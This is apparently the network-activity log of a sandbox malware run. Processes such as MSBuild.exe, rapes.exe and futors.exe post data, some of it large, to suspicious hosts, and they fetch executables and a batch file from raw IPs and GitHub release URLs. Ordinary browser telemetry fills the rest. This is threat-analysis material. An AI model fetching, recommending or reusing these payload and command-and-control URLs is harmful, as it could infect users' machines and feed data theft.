172.67.172.183:443

https://oreheatq.live/gsopp

tls, http

Rm3cVPI.exe

3.2kB
5.7kB
14
13

HTTP Request

POST https://oreheatq.live/gsopp

HTTP Response

200

HTTP Request

POST https://oreheatq.live/gsopp

HTTP Response

200
172.67.172.183:443

https://oreheatq.live/gsopp

tls, http

Rm3cVPI.exe

2.1kB
4.6kB
10
10

HTTP Request

POST https://oreheatq.live/gsopp

HTTP Response

200
172.67.172.183:443

https://oreheatq.live/gsopp

tls, http

Rm3cVPI.exe

1.1kB
4.6kB
9
9

HTTP Request

POST https://oreheatq.live/gsopp

HTTP Response

200
149.154.167.99:443

https://t.me/lw25chm

tls, http

MSBuild.exe

1.5kB
19.4kB
24
20

HTTP Request

GET https://t.me/lw25chm

HTTP Response

200
88.99.125.82:443

https://ru.ap.4t.com/

tls, http

MSBuild.exe

1.0kB
3.1kB
11
8

HTTP Request

GET https://ru.ap.4t.com/

HTTP Response

200
88.99.125.82:443

https://ru.ap.4t.com/

tls, http

MSBuild.exe

1.4kB
622 B
9
6

HTTP Request

POST https://ru.ap.4t.com/

HTTP Response

200
88.99.125.82:443

https://ru.ap.4t.com/

tls, http

MSBuild.exe

1.5kB
2.8kB
10
8

HTTP Request

POST https://ru.ap.4t.com/

HTTP Response

200
2.18.190.198:80

http://e6.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBTUejiAQejpjQc4fOz2ttjyD6VkMQQUDcXM%2FZvuFAWhTDCCpT5eisNYCdICEgYEVrKs0X5mI1JbaJC85MXisg%3D%3D

http

MSBuild.exe

467 B
861 B
5
3

HTTP Request

GET http://e6.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBTUejiAQejpjQc4fOz2ttjyD6VkMQQUDcXM%2FZvuFAWhTDCCpT5eisNYCdICEgYEVrKs0X5mI1JbaJC85MXisg%3D%3D

HTTP Response

200
88.99.125.82:443

https://ru.ap.4t.com/

tls, http

MSBuild.exe

1.7kB
6.5kB
13
10

HTTP Request

POST https://ru.ap.4t.com/

HTTP Response

200
88.99.125.82:443

https://ru.ap.4t.com/

tls, http

MSBuild.exe

1.5kB
672 B
9
6

HTTP Request

POST https://ru.ap.4t.com/

HTTP Response

200
88.99.125.82:443

https://ru.ap.4t.com/

tls, http

MSBuild.exe

6.1kB
645 B
13
8

HTTP Request

POST https://ru.ap.4t.com/

HTTP Response

200
88.99.125.82:443

https://ru.ap.4t.com/

tls, http

MSBuild.exe

1.7kB
565 B
9
6

HTTP Request

POST https://ru.ap.4t.com/

HTTP Response

200
88.99.125.82:443

https://ru.ap.4t.com/

tls, http

MSBuild.exe

227.0kB
4.2kB
172
97

HTTP Request

POST https://ru.ap.4t.com/

HTTP Response

200
88.99.125.82:443

https://ru.ap.4t.com/

tls, http

MSBuild.exe

58.0kB
1.2kB
51
21

HTTP Request

POST https://ru.ap.4t.com/

HTTP Response

200
88.99.125.82:443

https://ru.ap.4t.com/

tls, http

MSBuild.exe

184.8kB
3.6kB
144
83

HTTP Request

POST https://ru.ap.4t.com/

HTTP Response

200
142.250.180.4:443

www.google.com

chrome.exe

98 B
52 B
2
1
142.250.180.4:443

https://www.google.com/async/newtab_promos

tls, http2

chrome.exe

4.5kB
46.2kB
45
49

HTTP Request

GET https://www.google.com/async/ddljson?async=ntp:2

HTTP Request

GET https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0

HTTP Request

GET https://www.google.com/async/newtab_promos
104.21.74.51:443

https://smeltingt.run/giiaus

tls, http

MSBuild.exe

3.2kB
5.7kB
14
14

HTTP Request

POST https://smeltingt.run/giiaus

HTTP Response

200

HTTP Request

POST https://smeltingt.run/giiaus

HTTP Response

200
172.217.169.46:443

play.google.com

tls, http2

chrome.exe

2.3kB
8.7kB
10
10
104.21.74.51:443

https://smeltingt.run/giiaus

tls, http

MSBuild.exe

2.1kB
4.1kB
10
10

HTTP Request

POST https://smeltingt.run/giiaus

HTTP Response

200
104.21.74.51:443

https://smeltingt.run/giiaus

tls, http

MSBuild.exe

1.1kB
4.1kB
9
9

HTTP Request

POST https://smeltingt.run/giiaus

HTTP Response

200
185.215.113.16:80

http://185.215.113.16/test/amnew.exe

http

rapes.exe

16.4kB
452.7kB
329
328

HTTP Request

GET http://185.215.113.16/test/amnew.exe

HTTP Response

200
127.0.0.1:9223

MSBuild.exe
127.0.0.1:9223

MSBuild.exe
88.99.125.82:443

ru.ap.4t.com

tls

MSBuild.exe

2.4kB
605 B
10
7
88.99.125.82:443

https://ru.ap.4t.com/

tls, http

MSBuild.exe

1.7kB
565 B
9
6

HTTP Request

POST https://ru.ap.4t.com/

HTTP Response

200
88.99.125.82:443

https://ru.ap.4t.com/

tls, http

MSBuild.exe

311.8kB
6.4kB
233
142

HTTP Request

POST https://ru.ap.4t.com/

HTTP Response

200
185.215.113.209:80

http://185.215.113.209/Di0Her478/index.php

http

futors.exe

2.9kB
3.5kB
22
12

HTTP Request

POST http://185.215.113.209/Di0Her478/index.php

HTTP Response

200

HTTP Request

POST http://185.215.113.209/Di0Her478/index.php

HTTP Response

200

HTTP Request

POST http://185.215.113.209/Di0Her478/index.php

HTTP Response

200

HTTP Request

POST http://185.215.113.209/Di0Her478/index.php

HTTP Response

200

HTTP Request

POST http://185.215.113.209/Di0Her478/index.php

HTTP Response

200

HTTP Request

POST http://185.215.113.209/Di0Her478/index.php

HTTP Response

200

HTTP Request

POST http://185.215.113.209/Di0Her478/index.php

HTTP Response

200

HTTP Request

POST http://185.215.113.209/Di0Her478/index.php

HTTP Response

200

HTTP Request

POST http://185.215.113.209/Di0Her478/index.php

HTTP Response

200

HTTP Request

POST http://185.215.113.209/Di0Her478/index.php

HTTP Response

200
88.99.125.82:443

https://ru.ap.4t.com/

tls, http

MSBuild.exe

80.6kB
1.4kB
67
28

HTTP Request

POST https://ru.ap.4t.com/

HTTP Response

200
88.99.125.82:443

https://ru.ap.4t.com/

tls, http

MSBuild.exe

322.8kB
6.5kB
241
154

HTTP Request

POST https://ru.ap.4t.com/

HTTP Response

200
176.113.115.7:80

http://176.113.115.7/test/am_no.bat

http

rapes.exe

45.1kB
1.3MB
967
966

HTTP Request

GET http://176.113.115.7/files/newdef/apple.exe

HTTP Response

200

HTTP Request

GET http://176.113.115.7/test/exe/random.exe

HTTP Response

200

HTTP Request

GET http://176.113.115.7/test/am_no.bat
150.171.28.10:443

https://tse1.mm.bing.net/th?id=OADD2.10239340418534_1SATV94N425TECTRU&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

tls, http2

83.4kB
2.4MB
1742
1730

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239355235432_11K71SSHV5QGQD37N&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239340417880_1PRMSECURT9IUDN7Q&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239360615987_16QLWX2YIZJRGGD7R&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239355235433_11OUP2PBME21J4MUN&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239360615986_1M5N6Y5ACPFWCCI4D&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239340418534_1SATV94N425TECTRU&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

HTTP Response

200
150.171.28.10:443

tse1.mm.bing.net

tls, http2

1.2kB
6.9kB
15
13
150.171.28.10:443

tse1.mm.bing.net

tls, http2

1.2kB
6.9kB
15
13
150.171.28.10:443

tse1.mm.bing.net

tls, http2

1.2kB
6.9kB
15
13
172.217.16.238:443

https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromiumcrx&prodchannel=&prodversion=133.0.3065.69&lang=en-US&acceptformat=crx3,puff&x=id%3Dghbmnnjooekpmoecnnnilnnbdlolhkhi%26v%3D0.0.0.0%26installedby%3Dexternal%26uc

tls, http2

msedge.exe

3.2kB
10.9kB
15
17

HTTP Request

GET https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromiumcrx&prodchannel=&prodversion=133.0.3065.69&lang=en-US&acceptformat=crx3,puff&x=id%3Dghbmnnjooekpmoecnnnilnnbdlolhkhi%26v%3D0.0.0.0%26installedby%3Dexternal%26uc
150.171.27.11:80

http://edge.microsoft.com/browsernetworktime/time/1/current?cup2key=2:L2ViFaIONDkwbcrd2Qmgq6RzCoYlHCQHA5Z7og9kRds&cup2hreq=e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

http

msedge.exe

883 B
1.1kB
5
5

HTTP Request

GET http://edge.microsoft.com/browsernetworktime/time/1/current?cup2key=2:L2ViFaIONDkwbcrd2Qmgq6RzCoYlHCQHA5Z7og9kRds&cup2hreq=e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

HTTP Response

200
204.79.197.203:443

ntp.msn.com

tls

msedge.exe

3.0kB
6.6kB
12
11
150.171.27.11:443

https://edge.microsoft.com/serviceexperimentation/v3/?osname=win&channel=stable&osver=10.0.19041&devicefamily=desktop&installdate=1741933579&clientversion=133.0.3065.69&experimentationmode=2&scpguard=0&scpfull=0&scpver=0

tls, http2

msedge.exe

3.4kB
8.4kB
15
17

HTTP Request

GET https://edge.microsoft.com/serviceexperimentation/v3/?osname=win&channel=stable&osver=10.0.19041&devicefamily=desktop&installdate=1741933579&clientversion=133.0.3065.69&experimentationmode=2&scpguard=0&scpfull=0&scpver=0

HTTP Response

200
204.79.197.203:443

ntp.msn.com

tls

msedge.exe

2.1kB
311 B
7
5
95.101.143.218:443

copilot.microsoft.com

msedge.exe

98 B
52 B
2
1
150.171.27.11:443

edge.microsoft.com

msedge.exe

98 B
52 B
2
1
204.79.197.203:443

https://ntp.msn.com/bundles/v1/edgeChromium/latest/SSR-extension.828d19e24cc86fbcd5c9.js

tls, http2

msedge.exe

7.3kB
88.0kB
58
87

HTTP Request

GET https://ntp.msn.com/edge/ntp?locale=en-US&title=New%20tab&dsp=1&sp=Bing&startpage=1&PC=U531

HTTP Response

200

HTTP Request

GET https://ntp.msn.com/bundles/v1/edgeChromium/latest/web-worker.0fc632316541800cc1c2.js

HTTP Request

GET https://ntp.msn.com/bundles/v1/edgeChromium/latest/SSR-extension.828d19e24cc86fbcd5c9.js

HTTP Response

200

HTTP Response

200
150.171.27.11:443

https://edge.microsoft.com/extensionwebstorebase/v1/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=edgecrx&prodchannel=&prodversion=133.0.3065.69&lang=en-US&acceptformat=crx3,puff&x=id%3Djmjflgjpcpepeafmmgdpfkogkghcpiha%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1

tls, http2

msedge.exe

3.6kB
8.2kB
15
19

HTTP Request

GET https://edge.microsoft.com/extensionwebstorebase/v1/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=edgecrx&prodchannel=&prodversion=133.0.3065.69&lang=en-US&acceptformat=crx3,puff&x=id%3Djmjflgjpcpepeafmmgdpfkogkghcpiha%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1

HTTP Response

200
95.101.143.218:443

https://copilot.microsoft.com/c/api/user/eligibility

tls, http2

msedge.exe

2.9kB
5.5kB
15
17

HTTP Request

GET https://copilot.microsoft.com/c/api/user/eligibility

HTTP Response

200
142.250.200.1:443

https://clients2.googleusercontent.com/crx/blobs/Ad_brx3-BuL0c-lurTuHDvLGx_3o1po6xdCJ6biVPWmOWpEAIO3qQwYr84tWN8xt3Y-b4FBELB16YJo65m5b1LlifuobAPibVoX_4l94iArbx2Gsn4X-g9109tXuJL65PgYAxlKa5UnJV70rV6RKReARs98yYD2dVaKO/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_90_1_0.crx

tls, http2

msedge.exe

6.3kB
176.6kB
84
133

HTTP Request

GET https://clients2.googleusercontent.com/crx/blobs/Ad_brx3-BuL0c-lurTuHDvLGx_3o1po6xdCJ6biVPWmOWpEAIO3qQwYr84tWN8xt3Y-b4FBELB16YJo65m5b1LlifuobAPibVoX_4l94iArbx2Gsn4X-g9109tXuJL65PgYAxlKa5UnJV70rV6RKReARs98yYD2dVaKO/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_90_1_0.crx
2.18.190.171:443

https://assets.msn.com/staticsb/statics/latest/oneTrust/2.0/scripttemplates/otSDKStub.js

tls, http2

msedge.exe

3.7kB
14.0kB
20
22

HTTP Request

GET https://assets.msn.com/staticsb/statics/latest/oneTrust/2.0/scripttemplates/otSDKStub.js

HTTP Response

200
2.18.190.174:443

https://msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/bdc392b9-6b81-4aaa-b3ee-2fffd9562edb?P1=1743816634&P2=404&P3=2&P4=btFG9A%2fc4P4hxW%2fg37a8YcV9RQMA6NSmYNOlO4ZJ62Fcg82o7SeziN9DbQ5A%2fb1YvYFiUgVCqJgeruX25bwkDQ%3d%3d

tls, http2

msedge.exe

3.4kB
20.2kB
21
29

HTTP Request

GET https://msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/bdc392b9-6b81-4aaa-b3ee-2fffd9562edb?P1=1743816634&P2=404&P3=2&P4=btFG9A%2fc4P4hxW%2fg37a8YcV9RQMA6NSmYNOlO4ZJ62Fcg82o7SeziN9DbQ5A%2fb1YvYFiUgVCqJgeruX25bwkDQ%3d%3d

HTTP Response

200
2.18.190.171:443

assets.msn.com

tls

msedge.exe

2.3kB
5.1kB
10
10
20.26.156.215:443

https://github.com/legendary99999/vdsavdfvdfavsfd/releases/download/fdgvafdvadfvafdv/jokererer.exe

tls, http

futors.exe

1.9kB
17.9kB
27
23

HTTP Request

GET https://github.com/legendary99999/dsfadsfafd/releases/download/dfgvsfdvbafd/gron12321.exe

HTTP Response

302

HTTP Request

GET https://github.com/legendary99999/vfdfavsaf/releases/download/fdsxfasdfsdaf/alex1dskfmdsf.exe

HTTP Response

302

HTTP Request

GET https://github.com/legendary99999/vdsavdfvdfavsfd/releases/download/fdgvafdvadfvafdv/jokererer.exe

HTTP Response

302
150.171.28.10:443

tse1.mm.bing.net

tls, http2

1.2kB
6.9kB
15
13
88.221.135.25:443

www.bing.com

tls

msedge.exe

2.3kB
5.1kB
10
10
13.74.129.1:443

https://c.msn.com/c.gif?rnd=1743211833396&udc=true&pg.n=default&pg.t=dhp&pg.c=2083&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-US%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-gb&rid=583592b502f9469cba059551f752edaf&activityId=583592b502f9469cba059551f752edaf&d.imd=false&scr=1280x720&anoncknm=app_anon&issso=&aadState=0

tls, http2

msedge.exe

3.9kB
7.8kB
14
13

HTTP Request

GET https://c.msn.com/c.gif?rnd=1743211833396&udc=true&pg.n=default&pg.t=dhp&pg.c=2083&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-US%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-gb&rid=583592b502f9469cba059551f752edaf&activityId=583592b502f9469cba059551f752edaf&d.imd=false&scr=1280x720&anoncknm=app_anon&issso=&aadState=0

HTTP Response

302
150.171.27.10:443

c.bing.com

tls, http2

msedge.exe

2.8kB
8.6kB
11
16
95.101.143.219:443

th.bing.com

tls

msedge.exe

2.3kB
5.0kB
10
9
52.85.92.104:443

sb.scorecardresearch.com

tls, http2

msedge.exe

2.3kB
6.4kB
10
12
2.19.252.151:443

img-s-msn-com.akamaized.net

tls

msedge.exe

2.4kB
4.3kB
10
10
51.104.15.253:443

browser.events.data.msn.com

tls

msedge.exe

2.1kB
231 B
6
3
51.104.15.253:443

https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1743211833395&time-delta-to-apply-millis=use-collector-delta&w=0&NoResponseBody=true

tls, http2

msedge.exe

8.6kB
8.0kB
19
16

HTTP Request

POST https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1743211833395&time-delta-to-apply-millis=use-collector-delta&w=0&NoResponseBody=true

HTTP Response

204
150.171.27.10:443

https://c.bing.com/c.gif?rnd=1743211833396&udc=true&pg.n=default&pg.t=dhp&pg.c=2083&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-US%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-gb&rid=583592b502f9469cba059551f752edaf&activityId=583592b502f9469cba059551f752edaf&d.imd=false&scr=1280x720&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=F389EF4220A144399D7923EC5F6AD764&RedC=c.msn.com&MXFR=1BCC9635343F60E02399838B3518610E

tls, http2

msedge.exe

5.0kB
2.2kB
12
12

HTTP Request

GET https://c.bing.com/c.gif?rnd=1743211833396&udc=true&pg.n=default&pg.t=dhp&pg.c=2083&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-US%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-gb&rid=583592b502f9469cba059551f752edaf&activityId=583592b502f9469cba059551f752edaf&d.imd=false&scr=1280x720&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=F389EF4220A144399D7923EC5F6AD764&RedC=c.msn.com&MXFR=1BCC9635343F60E02399838B3518610E

HTTP Response

302
150.171.27.11:443

https://edge.microsoft.com/autofillservice/core/page/-581949006304227928/4169934183265382350?CIdAlgoVersion=2

tls, http2

msedge.exe

3.0kB
7.6kB
14
18

HTTP Request

GET https://edge.microsoft.com/autofillservice/core/page/-581949006304227928/4169934183265382350?CIdAlgoVersion=2

HTTP Response

200
2.19.252.151:443

https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1msDML?w=0&h=0&q=60&m=6&f=jpg&u=t

tls, http2

msedge.exe

15.0kB
563.4kB
248
415

HTTP Request

GET https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1msBhw?w=0&h=0&q=60&m=6&f=jpg&u=t

HTTP Request

GET https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA13Q6AL.img

HTTP Request

GET https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA18wU7w.img

HTTP Request

GET https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAc9vHK.img

HTTP Request

GET https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAdSfFf.img

HTTP Request

GET https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1rk2ap.img

HTTP Request

GET https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB107UWq.img

HTTP Request

GET https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA12sf7A?w=0&h=0&q=60&m=6&f=jpg&u=t

HTTP Request

GET https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1msDBP?w=0&h=0&q=60&m=6&f=jpg&u=t

HTTP Request

GET https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1msDML?w=0&h=0&q=60&m=6&f=jpg&u=t

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

304

HTTP Response

200

HTTP Response

200
2.19.252.151:443

img-s-msn-com.akamaized.net

tls

msedge.exe

2.5kB
923 B
9
8
2.19.252.151:443

img-s-msn-com.akamaized.net

tls

msedge.exe

2.3kB
4.3kB
11
10
2.19.252.151:443

img-s-msn-com.akamaized.net

tls

msedge.exe

2.3kB
4.3kB
11
11
13.74.129.1:443

https://c.msn.com/c.gif?rnd=1743211833396&udc=true&pg.n=default&pg.t=dhp&pg.c=2083&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-US%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-gb&rid=583592b502f9469cba059551f752edaf&activityId=583592b502f9469cba059551f752edaf&d.imd=false&scr=1280x720&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=F389EF4220A144399D7923EC5F6AD764&MUID=1BCC9635343F60E02399838B3518610E

tls, http2

msedge.exe

4.0kB
7.8kB
14
14

HTTP Request

GET https://c.msn.com/c.gif?rnd=1743211833396&udc=true&pg.n=default&pg.t=dhp&pg.c=2083&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-US%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-gb&rid=583592b502f9469cba059551f752edaf&activityId=583592b502f9469cba059551f752edaf&d.imd=false&scr=1280x720&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=F389EF4220A144399D7923EC5F6AD764&MUID=1BCC9635343F60E02399838B3518610E

HTTP Response

200
2.19.252.151:443

img-s-msn-com.akamaized.net

tls

msedge.exe

2.3kB
3.6kB
10
7
2.19.252.151:443

img-s-msn-com.akamaized.net

tls

msedge.exe

2.3kB
3.6kB
10
8
95.101.143.201:443

https://www.bing.com/api/shopping/v1/user/shoppingsettings?EnabledServiceFeaturesv2=edgeServerUX.shopping.aablockth,edgeServerUX.shopping.block99,edgeServerUX.shopping.disableCashbackOnCouponCopy,edgeServerUX.shopping.migrateClippingToOmnibox,edgeServerUX.shopping.msEdgeShoppingCashbackDismissTimeout2s

tls, http2

msedge.exe

3.1kB
6.6kB
15
17

HTTP Request

GET https://www.bing.com/api/shopping/v1/user/shoppingsettings?EnabledServiceFeaturesv2=edgeServerUX.shopping.aablockth,edgeServerUX.shopping.block99,edgeServerUX.shopping.disableCashbackOnCouponCopy,edgeServerUX.shopping.migrateClippingToOmnibox,edgeServerUX.shopping.msEdgeShoppingCashbackDismissTimeout2s

HTTP Response

200
204.79.197.203:443

srtb.msn.com

msedge.exe

98 B
52 B
2
1
204.79.197.203:443

srtb.msn.com

tls, http2

msedge.exe

2.9kB
7.3kB
11
15
204.79.197.203:443

https://srtb.msn.com/notify/served?rid=583592b502f9469cba059551f752edaf&r=infopane&i=15&p=edgechrntp&l=en-gb&d=bing&b=Edg&a=4a86be1e-d183-4105-9db5-52830d41ddf0&ii=1&c=11770813772205298655&bid=f15bc56f-f94f-4733-b1f1-6a39b6edfa2d&tid=edgechrntp-infopane-15&ptid=edgechrntp-peekinfopane-4&t=type.msft-content-card&dec=1_12-1_12

tls, http2

msedge.exe

12.4kB
15.5kB
30
34

HTTP Request

GET https://srtb.msn.com/notify/served?rid=583592b502f9469cba059551f752edaf&r=river&i=2&p=edgechrntp&l=en-gb&d=bing&b=Edg&a=b44fd1cb-393c-438a-ad3a-96eced77e919&ii=1&c=15307070020947675874&bid=eabfce7d-c15d-4dc8-b40c-0e4cfb8ad10c&tid=edgechrntp-river-2&ptid=edgechrntp-peekriver-2

HTTP Request

GET https://srtb.msn.com/notify/served?rid=583592b502f9469cba059551f752edaf&r=river&i=1&p=edgechrntp&l=en-gb&d=bing&b=Edg&a=6dae3265-8902-456c-a2d0-2bcb5050c551&ii=1&c=6847503952953801078&bid=eabfce7d-c15d-4dc8-b40c-0e4cfb8ad10c&tid=edgechrntp-river-1&ptid=edgechrntp-peekriver-1

HTTP Response

204

HTTP Response

204

HTTP Request

POST https://srtb.msn.com/auction

HTTP Response

200

HTTP Request

GET https://srtb.msn.com/notify/served?rid=583592b502f9469cba059551f752edaf&r=infopane&i=3&p=edgechrntp&l=en-gb&d=bing&b=Edg&a=112ccc59-9f03-42d3-a383-dc33f57f6ff4&ii=1&c=17503273880073193789&bid=f15bc56f-f94f-4733-b1f1-6a39b6edfa2d&tid=edgechrntp-infopane-3&ptid=edgechrntp-peekinfopane-1&t=type.msft-content-card&dec=1_12-1_12

HTTP Request

GET https://srtb.msn.com/notify/served?rid=583592b502f9469cba059551f752edaf&r=infopane&i=6&p=edgechrntp&l=en-gb&d=bing&b=Edg&a=a389378f-8a95-4bbf-bd53-502764ae7d5d&ii=1&c=17063763683721794245&bid=f15bc56f-f94f-4733-b1f1-6a39b6edfa2d&tid=edgechrntp-infopane-6&ptid=edgechrntp-peekInfopane-2&t=type.msft-content-card&dec=1_12-1_12

HTTP Request

GET https://srtb.msn.com/notify/served?rid=583592b502f9469cba059551f752edaf&r=infopane&i=15&p=edgechrntp&l=en-gb&d=bing&b=Edg&a=4a86be1e-d183-4105-9db5-52830d41ddf0&ii=1&c=11770813772205298655&bid=f15bc56f-f94f-4733-b1f1-6a39b6edfa2d&tid=edgechrntp-infopane-15&ptid=edgechrntp-peekinfopane-4&t=type.msft-content-card&dec=1_12-1_12

HTTP Response

204

HTTP Response

204

HTTP Response

204
204.79.197.203:443

https://srtb.msn.com/auction

tls, http2

msedge.exe

3.7kB
8.0kB
14
15

HTTP Request

OPTIONS https://srtb.msn.com/auction

HTTP Response

200
185.199.110.133:443

https://objects.githubusercontent.com/github-production-release-asset-2e65be/956649226/4d80b2da-e546-43e3-8ae4-f6bdab322270?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250329%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250329T013109Z&X-Amz-Expires=300&X-Amz-Signature=f670f6df372bfddfc0b556507bc103ffeef18dca4faf171da3224990ff4404c1&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Djokererer.exe&response-content-type=application%2Foctet-stream

tls, http

futors.exe

108.7kB
3.2MB
2299
2298

HTTP Request

GET https://objects.githubusercontent.com/github-production-release-asset-2e65be/954811811/dc4de189-3672-406e-ba17-8726ca7beb9b?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250329%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250329T013035Z&X-Amz-Expires=300&X-Amz-Signature=2767bd71fc66b7986d952c20b9bafe3cf85c4da9287a5f4470013514905158c6&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dgron12321.exe&response-content-type=application%2Foctet-stream

HTTP Response

200

HTTP Request

GET https://objects.githubusercontent.com/github-production-release-asset-2e65be/953100962/0fb6522f-c6fd-4f89-8ac9-d2cfdf8f9919?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250329%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250329T013050Z&X-Amz-Expires=300&X-Amz-Signature=3a44b1e5fc6e0ace5cdd851d4d524dc12ec47ea8851a2a11e76c557df6355dc3&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dalex1dskfmdsf.exe&response-content-type=application%2Foctet-stream

HTTP Response

200

HTTP Request

GET https://objects.githubusercontent.com/github-production-release-asset-2e65be/956649226/4d80b2da-e546-43e3-8ae4-f6bdab322270?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250329%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250329T013109Z&X-Amz-Expires=300&X-Amz-Signature=f670f6df372bfddfc0b556507bc103ffeef18dca4faf171da3224990ff4404c1&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Djokererer.exe&response-content-type=application%2Foctet-stream

HTTP Response

200
95.101.143.219:443

https://www.bing.com/aes/c.gif?DI=0&DIS=SB_15000-1?&RG=33f5df1682b342a49c1c15df156c73ae&SNR=1&GV=2&med=10

tls, http2

msedge.exe

9.8kB
199.7kB
110
160

HTTP Request

GET https://th.bing.com/th?id=ORMS.03d4aa3332e1565e1d5ecaf515f087c2&pid=Wdp&w=612&h=304&qlt=90&c=1&rs=1&dpr=1&p=0

HTTP Request

